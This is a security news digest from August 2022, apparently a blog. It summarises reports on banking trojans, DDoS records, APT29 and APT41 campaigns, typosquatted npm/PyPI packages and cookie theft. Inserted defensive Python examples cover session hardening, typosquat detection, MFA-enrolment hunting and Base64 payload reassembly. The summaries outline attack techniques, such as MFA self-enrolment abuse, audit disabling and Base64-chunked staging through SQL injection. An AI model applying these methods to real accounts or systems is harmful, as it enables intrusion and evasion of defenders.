
If all of this succeeds, it gathers some basic information, checks for the presence of crypto wallets which it will investigate later and then fetches the main payload. This uses even more antiforensics techniques - for example, it includes two tightly-compressed bitmapped images which, when expanded, inflate the resulting binary to over 400 MBytes, which exceeds the size limit for most execution sandboxes.

From there on, Grandoreiro communicates with its C2 network in exactly the same way as LatentBot, and can download any of a huge selection of backdoor capabilities.

Shivtarkar, Niraj, Grandoreiro Banking Trojan with New TTPs Targeting Various Industry Verticals, Zscaler ThreatLabz blog, 18 August 2022. Available online at https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals.

More Info on Mēris

Google has released a bit more information about last week's massive DDoS attack by the Mēris botnet. Apparently there were 5,256 source IP addresses from 132 countries engaged in the attack - approximately 22% of them Tor exit nodes (although these accounted for only 3% of the traffic). As previously mentioned, the use of TLS/SSL required the connections to be terminated in order to inspect the traffic; however, relatively few TLS handshakes were needed, because the attackers used HTTP pipelining, which sends multiple requests over a single HTTP connection.

Google Cloud Armor's 'Adaptive Protection' feature was apparently able to quickly identify the attack, alert the customer and recommend a protective rule - in this case, rate-limiting the connections, which would still allow legitimate traffic.

Kiner, Emil and Satya Kondaru, How Google Cloud blocked the largest Layer 7 DDoS attack at 46 million rps, Google Cloud blog, 19 August 2022. Available online at https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps.


[ Modified: Tuesday, August 23, 2022, 9:04 AM ]
 
by Les Bell - Monday, August 22, 2022, 7:45 AM


News Stories


Chip Makers Take On PQCrypto

We have written here before about the need for cryptographic agility - the ability to replace those public-key crypto algorithms that are expected to fall, sooner or later, to quantum cryptanalysis. That's a challenge, because most of the quantum-resistant algorithms are compute-intensive, but desktop, laptop and cloud server machines should be able to cope without too much difficulty.

However, the same is not true for the small, low-powered, system-on-a-chip devices that power the Internet of Things. This is especially true for the smart cards used as credit cards, access badges, etc., which will require specialised hardware to be able to perform acceptably. In the first part of an interview, Joppe W. Bos, senior principal cryptographer at NXP Semiconductor, explains some of the challenges - as co-creator of the CRYSTALS-Kyber algorithm recently adopted by NIST for standardization, he is in a unique position to describe the challenges.

Valerio, Pablo, Post-Quantum Cryptography needs to be ready to protect IoT, IoT Times, 17 August 2022. Available online at https://iot.eetimes.com/post-quantum-cryptography-needs-to-be-ready-to-protect-iot/.

Intel Adds CPU Circuitry to Defeat Power-On Attacks

Processors that incorporate a Trusted Platform Module have an obscure vulnerability in which an attacker manipulates the voltage supplied to the CPU at just the right moment - as it is loading the firmware for its security engine. By triggering an error condition at that instant, the attacker could get the security engine to load malicious firmware, which would then grant access to data, such as biometric templates, stored in the TPM.

Now Intel is adding a tunable replica circuit to the company's 12th generation Alder Lake Core processors, which correlates the times and voltages at which the various circuits on a motherboard power up, and if they don't match, will generate an error and failsafe reset. The circuit is being added to these laptop processors because the attack - which remains theoretical at this stage - requires physical access to the motherboard, something that is harder to achieve for server and desktop machines.

Shah, Agam, Intel Adds New Circuits to Chips to Ward Off Motherboard Exploits, Dark Reading, 20 August 2022. Available online at https://www.darkreading.com/dr-tech/intel-adds-new-circuit-to-chips-to-ward-off-motherboard-exploits.

Fake Cloudflare DDoS Protection Pages Trick Users Into Installing Trojans

Occasionally, when visiting a busy web site, you will see a Cloudflare DDoS protection page that holds you up for a few seconds, a way of rate-limiting bots attempting to overwhelm the site with bogus requests. In a new social engineering twist, attackers are injecting an obfuscated JavaScript payload into poorly secured WordPress sites; it displays a fake Cloudflare DDoS check page, then asks the visitor to click a button to skip the delay. The click downloads a disk image called 'security_install.iso', which the victim is told installs a program named DDOS GUARD that will give them faster access.

In fact, the image holds the first of a chain of Windows PowerShell scripts which culminates in the installation of the NetSupport remote access trojan and the Raccoon Stealer information stealer on the victim's system.

Defensive measures include hardening WordPress sites properly, and educating users never to install programs that pop-up messages of this kind prompt them to download.

Toulas, Bill, WordPress sites hacked with fake Cloudflare DDoS alerts pushing malware, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/wordpress-sites-hacked-with-fake-cloudflare-ddos-alerts-pushing-malware/.

Gimme Cookie! Want Cookie!

A timely reminder that web session security ultimately depends on cookies, which are vulnerable to a variety of stealing attacks. Although authentication to a web site might involve multi-factor authentication, once that has been done, everything depends on the session cookie. And because those cookies can be quite long-lived - who wants to log in to a web site every few minutes? - markets are emerging where stolen cookies are sold. Low-end cybercriminals can operate malware like Raccoon Stealer and RedLine Stealer, but may lack the sophistication to exploit the credentials once they have them, so they sell them on.

Once issued by a server, cookies are stored by the browser, usually in an SQLite database which may also hold saved usernames and passwords. Attackers use a variety of techniques to extract them, and the stolen cookies can then be replayed to take over Microsoft 365 and Google Workspace sessions, among others.

Perhaps it's time for us to accept the inconvenience of having to re-authenticate more frequently in order to minimise the likelihood of this attack?
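One way to make a stolen cookie worth less, as an added example that is not code from the Sophos article or any product: a server-side session store that keeps only an HMAC of the bearer token, enforces both an idle timeout and an absolute lifetime (the re-authentication the paragraph above asks for), and binds each session to a coarse client fingerprint so a cookie replayed from an infostealer buyer's machine is rejected and revoked. The timeouts, the fingerprint recipe and the cookie name are assumptions chosen for the example.

```python
"""Server-side session handling that limits what a stolen cookie is worth.

Added example; not code from the Sophos article or any product. The store
keeps only an HMAC of each bearer token, enforces an idle timeout and an
absolute lifetime, and binds each session to a coarse client fingerprint so a
cookie replayed from an infostealer buyer's machine is rejected and revoked.
Timeouts, the fingerprint recipe and the cookie name are assumptions.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

IDLE_TIMEOUT = 15 * 60           # assumption: 15 minutes without a request
ABSOLUTE_LIFETIME = 8 * 60 * 60  # assumption: full re-authentication every 8 hours


@dataclass
class Session:
    user: str
    issued_at: float
    last_seen: float
    client_fp: str


class SessionStore:
    def __init__(self, secret: bytes) -> None:
        self._secret = secret
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def fingerprint(user_agent: str, client_ip: str) -> str:
        # Coarse binding: user agent plus the client's /24. A cookie replayed
        # from another browser or network will not match. (IPv4 only here.)
        net = ".".join(client_ip.split(".")[:3])
        return hashlib.sha256(f"{user_agent}|{net}".encode()).hexdigest()

    def _key(self, token: str) -> str:
        # Only an HMAC of the token is stored, so a dump of the session table
        # cannot be turned back into usable cookies.
        return hmac.new(self._secret, token.encode(), hashlib.sha256).hexdigest()

    def issue(self, user: str, user_agent: str, client_ip: str,
              now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = Session(
            user, now, now, self.fingerprint(user_agent, client_ip))
        return token

    def validate(self, token: str, user_agent: str, client_ip: str,
                 now: Optional[float] = None) -> Tuple[Optional[str], str]:
        """Return (user, "ok") or (None, reason). Any failure revokes the session."""
        now = time.time() if now is None else now
        key = self._key(token)
        sess = self._sessions.get(key)
        if sess is None:
            return None, "unknown"
        if now - sess.issued_at > ABSOLUTE_LIFETIME:
            reason = "expired-absolute"
        elif now - sess.last_seen > IDLE_TIMEOUT:
            reason = "expired-idle"
        elif not hmac.compare_digest(sess.client_fp,
                                     self.fingerprint(user_agent, client_ip)):
            reason = "fingerprint-mismatch"
        else:
            sess.last_seen = now
            return sess.user, "ok"
        del self._sessions[key]
        return None, reason

    @staticmethod
    def set_cookie(token: str) -> str:
        # Secure + HttpOnly + SameSite keep the cookie off clear-text links,
        # away from page scripts and out of cross-site requests; the __Host-
        # prefix pins it to this origin. Max-Age mirrors the absolute lifetime;
        # the store still enforces the idle timeout server-side.
        return (f"__Host-session={token}; Path=/; Secure; HttpOnly; "
                f"SameSite=Strict; Max-Age={ABSOLUTE_LIFETIME}")
```

The fingerprint binding is deliberately coarse: a laptop roaming between networks will be logged out and must re-authenticate, which is the trade-off the paragraph above proposes. None of this stops an infostealer reading the cookie from disk; it only shortens the window in which, and narrows the places from which, the stolen cookie can be used.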

Gallagher, Sean, Cookie stealing: the new perimeter bypass, Sophos X-Ops, 18 August 2022. Available online at https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass/.

Attribution Insights from IBM X-Force Research

A fascinating deep dive into malware analysis from IBM X-Force Research shows how the Bumblebee malware, which first appeared last year, was probably developed from the source code of the Ramnit banking trojan. What is interesting about this - apart from the malware coding techniques uncovered - is that Bumblebee has been linked to offshoots of the Conti ransomware group, which fragmented following a series of high-profile leaks of chat messages and the doxxing of some group members.

This suggests that the various spinoffs from Conti are forming new alliances and acquiring new TTPs, possibly heralding completely new attacks. The report makes fascinating reading for those who enjoy reverse-engineering malware.

Hammond, Charlotte and Ole Villadsen, From Ramnit to Bumblebee (via NeverQuest): Similarities and Code Overlap Shed Light on Relationships Between Malware Developers, IBM Security Intelligence, 18 August 2022. Available online at https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest/.

Online Scammers Often Victims Themselves

While we are all familiar with tech support scammers operating out of Mumbai, it seems that a new breed of financial scammers has arisen, operating out of Laos, Myanmar and Cambodia under the control of Taiwanese and Chinese scam bosses. In Cambodia, for example, giant casinos built to lure Chinese gamblers found themselves near-empty due to COVID travel restrictions and were re-purposed as scam operations, staffed by migrant workers lured by fraudulent job ads or even abducted off the street, and who are now held against their will in slave conditions.

The trafficked workers are forced to work from 8 am to 11 pm each day, and threatened or beaten if they do not raise enough money from their victims; trying to leave is dangerous, with some being killed and others recaptured. The gang bosses are well connected, both politically and to local police, who are notoriously lax in investigating or even side with the bosses. This is an untimely reminder that cybercrime isn't just about bits of information and purely financial gain, but sometimes crosses over into people trafficking, slavery and worse.

Kennedy, Lindsey and Nathan Paul Southern, The online scammer targeting you could be trapped in a South-East Asian fraud factory, The Sydney Morning Herald, 21 August 2022. Available online at https://www.smh.com.au/world/asia/the-online-scammer-targeting-you-could-be-trapped-in-a-south-east-asian-fraud-factory-20220818-p5baz3.html.


by Les Bell - Saturday, August 20, 2022, 9:16 AM


News Stories


New Variant of Jaca Malware Is Highly Configurable

An updated variant of the Jaca malware toolkit includes new components which form a long chain of actions to infect a victim's system, according to security consultancy Morphisec. The Windows toolkit has been used extensively by a South Asian threat actor called DoNot Team or APT-C-35, and they keep improving it.

The latest variant makes use of RTF (Rich Text Format) documents that trick the user into enabling macros. This then allows a macro to inject some shellcode into memory and that, in turn, downloads a second stage loader from its C2 server. It then downloads a DLL file from another C2 server, which sends system information back to its operators, makes itself persistent via a Scheduled Task and finally downloads the real payload, which will selectively exfiltrate data such as keystrokes, screenshots, files and browser data, using loadable modules.

This modularity gives DoNot Team considerable flexibility in adapting their malware, which they use to attack defence, diplomatic, government and military organizations in India, Pakistan, Sri Lanka and Bangladesh.

Cohen, Hido and Arnold Osipov, APT-C-35 Gets a New Upgrade, Morphisec Breach Prevention Blog, 11 August 2022. Available online at https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed.

Cryptominers Spread Via Python Repositories

Software developer and researcher Hauke Lübbers 'stumbled across', and security firm Sonatype has confirmed, a threat actor who has published at least 241 malicious packages to npm (the Node Package Manager registry) and PyPI (the Python Package Index). The packages bear names similar to popular open source projects such as React and argparse, but actually download and install the XMRig cryptominer to mine Monero. All of them were published by an account called '17b4a931'.

However, you would have to wonder about the abilities of a developer who would mistake 'r2act' for 'React'.
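Developers do make that mistake, which is why a dependency list is worth checking mechanically. The following is an added example, not code from Sonatype or the researcher: it normalises package names (case, separators and the digit-for-letter swaps typosquatters favour) and flags any name that lands within a small edit distance of a popular package without being that package. The popular-package list, the homoglyph table and the distance thresholds are assumptions for the example; in practice the list would come from registry download statistics.

```python
"""Typosquat check for a dependency list.

Added example, not code from Sonatype or Hauke Lübbers. Flags package names
that normalise to, or sit within a small edit distance of, a popular package
without actually being it. POPULAR, HOMOGLYPHS and the thresholds are
assumptions constructed for this example.
"""
import re
from typing import Dict, Iterable, Set, Tuple

POPULAR: Set[str] = {"react", "requests", "argparse", "numpy", "lodash",
                     "express", "urllib3", "colorama"}

# Digits commonly swapped for the letters they resemble (assumed subset).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "2": "e", "3": "e",
                            "4": "a", "5": "s", "7": "t", "8": "b"})


def normalize(name: str) -> str:
    """Lower-case, unify separators and undo digit-for-letter swaps."""
    return re.sub(r"[-_.]+", "-", name.lower()).translate(HOMOGLYPHS)


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance (insert, delete, substitute, swap)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def closest_popular(name: str, popular: Set[str] = POPULAR) -> Tuple[str, int]:
    """Return (popular_name, distance) for the nearest popular package."""
    n = normalize(name)
    best = min(popular, key=lambda p: damerau_levenshtein(n, normalize(p)))
    return best, damerau_levenshtein(n, normalize(best))


def flag_typosquats(names: Iterable[str], popular: Set[str] = POPULAR) -> Dict[str, str]:
    """Map each suspicious requested name to the popular package it imitates."""
    findings: Dict[str, str] = {}
    for name in names:
        if name.lower() in popular:
            continue  # the genuine package
        target, dist = closest_popular(name, popular)
        # Assumed thresholds: one edit for short names, two for 8+ characters.
        limit = 1 if len(target) < 8 else 2
        if dist <= limit:
            findings[name] = target
    return findings
```

Run `flag_typosquats` over the names in a requirements.txt or package.json before installing; 'r2act' normalises straight to 'react' and is caught at distance zero, while a transposition such as 'reqeusts' is caught at distance one. Exact matches are skipped on purpose so the check does not flag the real package.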

Sharma, Ax, More than 200 cryptomining packages flood npm and PyPI registry, Sonatype, 19 August 2022. Available online at https://blog.sonatype.com/more-than-200-cryptominers-flood-npm-and-pypi-registry.

Threat Actor Targets Hospitality and Travel

A small threat actor called TA558 is operating in Latin America, North America and Western Europe, targeting hospitality, travel and related industries. The group uses malmails written in Portuguese, Spanish and sometimes English, enquiring about reservations - something recipients cannot afford to ignore. However, the attachment is one of over 15 different malware payloads the group uses - mostly remote access trojans that can be used for reconnaissance, information exfiltration and the dropping of more advanced payloads.

The group has been active since at least 2018, but has ramped up its efforts in 2022, perhaps because post-COVID recovery in travel offers it increased opportunities. It has also switched TTPs, from Word macros (now usually disabled by default) to malware such as Loda RAT, Revenge RAT and others, hosted at URLs or enclosed in container formats such as RAR and ISO files.

Wise, Joe, et al., Reservations Requested: TA558 Targets Hospitality and Travel, Proofpoint blog, 18 August 2022. Available online at https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel.

Cozy Bear Targets Foreign Policy Info in Microsoft 365

Russian state-backed APT 29, aka Cozy Bear, has been busy this year, with new TTPs which it uses to compromise Microsoft 365 accounts. In one case, the attackers ran a password-guessing attack against a list of accounts and hit one that had been provisioned but never used. Because the account had never signed in, Azure Active Directory's MFA self-enrollment process simply prompted the attacker to register a device for MFA - which they did, using their own. Having done this, they were free to roam the domain as that user.

To evade detection, the attackers also disabled the 'Purview Audit' feature on targeted accounts, which logs details of mailbox accesses. They also ran their operations from Azure VMs, so their traffic came from Microsoft IP addresses and was hard to distinguish from legitimate activity within the Azure networks.
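Both tricks leave traces that can be hunted for. The following is an added example, not Mandiant's code or detection content: it runs over constructed audit records in an Azure AD-like shape (the field and event names are assumptions, not the real schema) and flags a security-info registration when the account had no sign-in history before the session that registered it, or when the registering client sits outside the organisation's expected address space, and flags any event that switches mailbox auditing off. The trusted ranges and the records are constructed.

```python
"""Hunting for attacker MFA self-enrolment on dormant accounts.

Added example, not Mandiant's code or detection content. Runs over constructed
audit records in an Azure AD-like shape (field and event names are
assumptions, not the real schema). Trusted ranges and records are constructed.
"""
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

TRUSTED_NETS = [ipaddress.ip_network("198.51.100.0/24")]  # constructed office range
DORMANT_WINDOW = timedelta(hours=1)  # assumption: first-ever sign-in within an hour of enrolment

# Constructed records, in time order.
RECORDS = [
    {"ts": "2022-07-12T08:30:00Z", "user": "j.doe", "event": "SignIn", "result": "success", "ip": "198.51.100.10"},
    {"ts": "2022-08-01T09:00:00Z", "user": "j.doe", "event": "SignIn", "result": "success", "ip": "198.51.100.10"},
    {"ts": "2022-08-01T09:01:00Z", "user": "j.doe", "event": "SecurityInfoRegistered", "ip": "198.51.100.10"},
    {"ts": "2022-08-03T02:14:00Z", "user": "svc-legacy", "event": "SignIn", "result": "success", "ip": "20.0.0.10"},
    {"ts": "2022-08-03T02:14:30Z", "user": "svc-legacy", "event": "SecurityInfoRegistered", "ip": "20.0.0.10"},
    {"ts": "2022-08-03T02:20:00Z", "user": "svc-legacy", "event": "MailboxAuditDisabled", "ip": "20.0.0.10"},
]


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def first_successful_signin(records) -> Dict[str, datetime]:
    """Earliest successful sign-in per user across the whole record set."""
    first: Dict[str, datetime] = {}
    for r in records:
        if r["event"] == "SignIn" and r.get("result") == "success":
            first.setdefault(r["user"], parse_ts(r["ts"]))
    return first


def analyse(records) -> List[Tuple[str, str, List[str]]]:
    """Return (timestamp, user, reasons) for each suspicious record."""
    first = first_successful_signin(records)
    findings = []
    for r in records:
        reasons = []
        if r["event"] == "SecurityInfoRegistered":
            when = parse_ts(r["ts"])
            earliest = first.get(r["user"])
            # The attacker's own sign-in precedes the enrolment, so "dormant"
            # means the account's first-ever sign-in falls inside the window.
            if earliest is None or when - earliest <= DORMANT_WINDOW:
                reasons.append("mfa-enrolled-on-previously-dormant-account")
            if not is_trusted(r["ip"]):
                reasons.append("enrolment-from-untrusted-network")
        elif r["event"] == "MailboxAuditDisabled":
            reasons.append("mailbox-audit-disabled")
        if reasons:
            findings.append((r["ts"], r["user"], reasons))
    return findings
```

The dormant-account rule is the important one: a genuine new starter also enrols within minutes of their first sign-in, so the finding should be triaged against HR onboarding data or, better, removed at the source by requiring MFA registration only from a trusted network or with a Temporary Access Pass issued by the help desk (an assumption about policy, not something the source prescribes).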

Bienstock, Douglas, You Can't Audit Me: APT29 Continues Targeting Microsoft 365, Mandiant blog, 18 August 2022. Available online at https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft.

JWST Runs JavaScript. JavaScript?

While we all marvel at the stunning images being sent from the James Webb Space Telescope, it's interesting to reflect on the fact that the scripts that control the imaging instruments are actually written in JavaScript - actually a variant called Nombas ScriptEase 5.00e which was last updated in January 2003.

This really should not come as a big surprise - the JWST has been in development since 1989, and when construction started in 2004, Nombas ScriptEase 5.00e would have been less than two years old. It's not unusual for government and major scientific projects to use quite old and stable technology - NASA has in the past been known to search second-hand component markets for parts like 8086 processors, while other parts of government were still using VAXen long after the rest of the world had moved on.

Clark, Mitchell, The James Webb Space Telescope runs JavaScript, apparently, The Verge, 18 August 2022. Available online at https://www.theverge.com/2022/8/18/23206110/james-webb-space-telescope-javascript-jwst-instrument-control.


[ Modified: Saturday, August 20, 2022, 9:16 AM ]

by Les Bell - Friday, August 19, 2022, 9:12 AM


News Stories


New Record HTTPS DDoS Attack

A massive DDoS attack over HTTPS was directed at one of Google's Cloud Armor DDoS protection customers in early June. The 69-minute attack started at 10,000 requests per second against the customer's load balancer and, ten minutes later, peaked at 46 million requests per second - equivalent to receiving a full day's requests to Wikipedia within 10 seconds.

The attack appears to have been delivered by the Mēris botnet, although this is more than twice the rate it had previously achieved. Mēris delivers its traffic through unsecured proxies, and because the requests were over HTTPS, both the botnet and the victim had to spend considerable compute power on TLS handshakes.

Ilascu, Ionut, Google blocks largest HTTPS DDoS attack 'reported to date', Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/google-blocks-largest-https-ddos-attack-reported-to-date/.

Prisoner Details Leaked by Misdirected Email

The Western Australian Department of Justice has had to apologise after sensitive details - full names, an image, date of birth and information about partners - of two prisoners were accidentally sent to the wrong distribution list.

The error occurred when an employee was trying to organize approval for an inter-prison phone call between family members, but picked the wrong list.

This kind of error happens frequently - one memorable case occurred when an employee of a major retail chain sent out a large spreadsheet containing details of gift cards to everyone who had purchased one of the gift cards. Unsurprisingly, a few of the recipients, having obtained details of so many tokens, took the opportunity to use them. If ever there was an argument for the use of groupware or - better still - automated workflows for approval processes, this is it.

Fiore, Briana, Department of Justice apologises over leak of 'sensitive' WA prisoner details, ABC News, 18 August 2022. Available online at https://www.abc.net.au/news/2022-08-18/department-of-justice-wa-apology-prisoner-information-leak/101346460.

Apple Releases Safari 15.6.1 to Fix Zero-Day Exploit

A buffer overflow vulnerability in WebKit, the rendering engine at the core of Apple's Safari browser, is being exploited in the wild, leading the company to release an update for the browser. Like other buffer overflows, this vuln could be used to crash the browser, corrupt data or even achieve remote code execution.

Abrams, Lawrence, Apple releases Safari 15.6.1 to fix zero-day bug used in attacks, Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/apple-releases-safari-1561-to-fix-zero-day-bug-used-in-attacks/.

Deep Analysis of APT 41, Winnti/Wicked Spider

Singapore-based security firm Group-IB has released a detailed report on the activities of the Chinese-backed threat actor APT 41, also known as Winnti or Wicked Spider. During 2021, APT 41 were very busy, hitting a total of 80 different private and public sector enterprises and using novel techniques to deploy its customized Cobalt Strike toolkit, perhaps to evade detection. They encoded the main binary into Base64, which was then broken up into chunks of 775 or 1,024 characters, then appended to a text file and directed at the victim using an SQL injection attack.

Using this technique, the attackers were only able to achieve success about half the time, suggesting they are more interested in victim quantity than quality. It seems that APT 41 may be a coalition of smaller groups, as they use a wide variety of tools after initial compromise and mix cyber-espionage activities with financial cybercrime.
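A payload staged in fixed-size Base64 chunks leaves a distinctive pattern in web server logs. The following is an added example, not Group-IB's code: it scans constructed access-log lines for requests carrying long Base64 runs, groups them by client address, reassembles them in arrival order and checks whether the decoded bytes begin with a PE 'MZ' header. The log format, the request parameter, the chunk size and the sample 'binary' are all constructed for the example; the page's source does not give the attacker's exact query.

```python
"""Spotting a binary staged in Base64 chunks through injected requests.

Added example, not Group-IB's code. Log format, parameter name, chunk size
and FAKE_EXE are assumptions constructed for this example.
"""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# A run of at least 512 Base64 characters, optionally padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{512,}={0,2}")
# Minimal common-log-format parser (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed stand-in for a PE file: the 'MZ' magic plus filler bytes.
FAKE_EXE = b"MZ" + bytes(range(256)) * 8


def chunks_from_log(lines: List[str]) -> Dict[str, List[str]]:
    """Collect long Base64 runs per client address, in log order."""
    per_client: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for run in B64_RUN.findall(m.group("url")):
            per_client[m.group("ip")].append(run)
    return per_client


def reassemble(chunks: List[str]) -> Optional[bytes]:
    """Concatenate chunks in order and decode; None if not valid Base64."""
    try:
        return base64.b64decode("".join(chunks), validate=True)
    except (ValueError, TypeError):
        return None


def looks_like_pe(blob: Optional[bytes]) -> bool:
    return blob is not None and blob[:2] == b"MZ"


def find_staged_binaries(lines: List[str]) -> Dict[str, Tuple[int, int]]:
    """Map client IP -> (chunk count, decoded size) where a PE was staged."""
    out: Dict[str, Tuple[int, int]] = {}
    for ip, chunks in chunks_from_log(lines).items():
        blob = reassemble(chunks)
        if looks_like_pe(blob):
            out[ip] = (len(chunks), len(blob))
    return out


def constructed_log() -> List[str]:
    """Three 1,024-character chunks from one client, with an unrelated request mixed in."""
    payload = base64.b64encode(FAKE_EXE).decode()
    parts = [payload[i:i + 1024] for i in range(0, len(payload), 1024)]
    lines = [f'203.0.113.9 - - [10/Jun/2021:03:1{i}:00 +0000] '
             f'"GET /search.php?q={p} HTTP/1.1" 200' for i, p in enumerate(parts)]
    lines.insert(1, '198.51.100.4 - - [10/Jun/2021:03:12:00 +0000] "GET /index.php HTTP/1.1" 200')
    return lines
```

Reassembly depends on the chunks arriving in order from one address, which is how an attacker appending to a file would send them; a real deployment would also bucket by session or target parameter and tolerate retries. The 'MZ' check is the cheapest useful signal; the same hook is where a hash lookup or a YARA scan of the decoded blob would go.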

Rostovstev, Nikita, APT41 World Tour 2021 on a tight schedule, Group-IB, 18 August 2022. Available online at https://blog.group-ib.com/apt41-world-tour-2021.

Janet Jackson Awarded CVE-2022-38392 for 'Rhythm Nation'

An interesting twist on attacks that cross air gaps: playing the Janet Jackson music video Rhythm Nation on one laptop could cause a nearby laptop to crash, as well as the one playing it. The problem, discovered by a computer manufacturer in the Windows XP era, was found - after some serious research - to be due to the audio containing one of the natural resonant frequencies of the 5400 RPM hard disk drives used by that and other laptop manufacturers, and was fixed by adding a custom audio filter to keep that part of the spectrum from reaching the speakers.

Urban myth? Perhaps, but MITRE has nonetheless assigned it CVE-2022-38392.

Chen, Raymond, Janet Jackson had the power to crash laptop computers, Microsoft 'The Old New Thing' blog, 16 August 2022. Available online at https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994.


by Les Bell - Wednesday, August 17, 2022, 5:56 PM


News Stories


Google Wins One, Loses One

Last year, the Australian Competition and Consumer Commission found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting they needed to change to stop the search giant collecting their location data was 'Location History'. In fact another setting, 'Web & App Activity', which is turned on by default, also had to be turned off.

Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the offence occurred before the maximum penalty for breaches of Australian consumer law was increased - from November 2018 it was increased to the higher of $10 million, three times the benefit obtained from the alleged conduct or otherwise, 10% of turnover.

On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and, by refusing to take down a link, was guilty of defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists, or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the contents of that article to a third party".

ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.

Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.

Secure Boot Loader Causes More Problems

We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.

Last week's patch, KB5012170, added the signatures of the vendors' files to the Secure Boot Forbidden Signature Database (DBX), which holds the UEFI revocation list. However, systems which do not have a valid bootloader generate a 0x800f0922 error and fail to install the patch - fortunately for the user, as the system would not boot if the patch were applied.

Other users report that after the patch is applied, Windows 11 PCs boot to a BitLocker recovery screen - not a problem if the user has the recovery key, but home users almost never do. In well-managed environments, a domain administrator can retrieve the key from Active Directory Domain Services, where it should have been escrowed.

Windows 10 users are reporting other problems - slow boot times or their RAID mode being changed to AHCI in the firmware settings, triggering a Blue Screen of Death.

Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.

Millions of Realtek-based Network Devices Vulnerable

Researchers from Argentine company Faraday Security have demonstrated proof-of-concept code exploiting a vulnerability they discovered in the Realtek RTL819x system-on-a-chip (SoC). This chip is used in millions of networking devices such as routers.

Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.

Equifax Fallout Continues; SEC Charges Three

We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by their investigations of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he also helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately $US108,000 in profits, split between the participants.

U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Release No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.

Chrome Zero-Day In The Wild

A vulnerability in the Chrome desktop browser, first reported by Google's Threat Analysis Group in July, now has an exploit circulating in the wild. CVE-2022-2856 is a case of insufficient validation of untrusted input, and Google has responded by pushing out an update which also fixes ten other security flaws, mostly use-after-free bugs in Chrome components.

Lakshamanan, Ravie, New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild, The Hacker News, 18 August 2022. Available online at https://thehackernews.com/2022/08/new-google-chrome-zero-day.html.

Trojan Dropper Lives On, Thanks to Anti-Forensics

Researchers from Secureworks have done a deep analysis on a sophisticated trojan dropper called DarkTortilla which has been circulating since 2015, yet manages to still spread widely, dropping malware on behalf of a wide range of threat actors, due to its complex anti-forensics techniques.

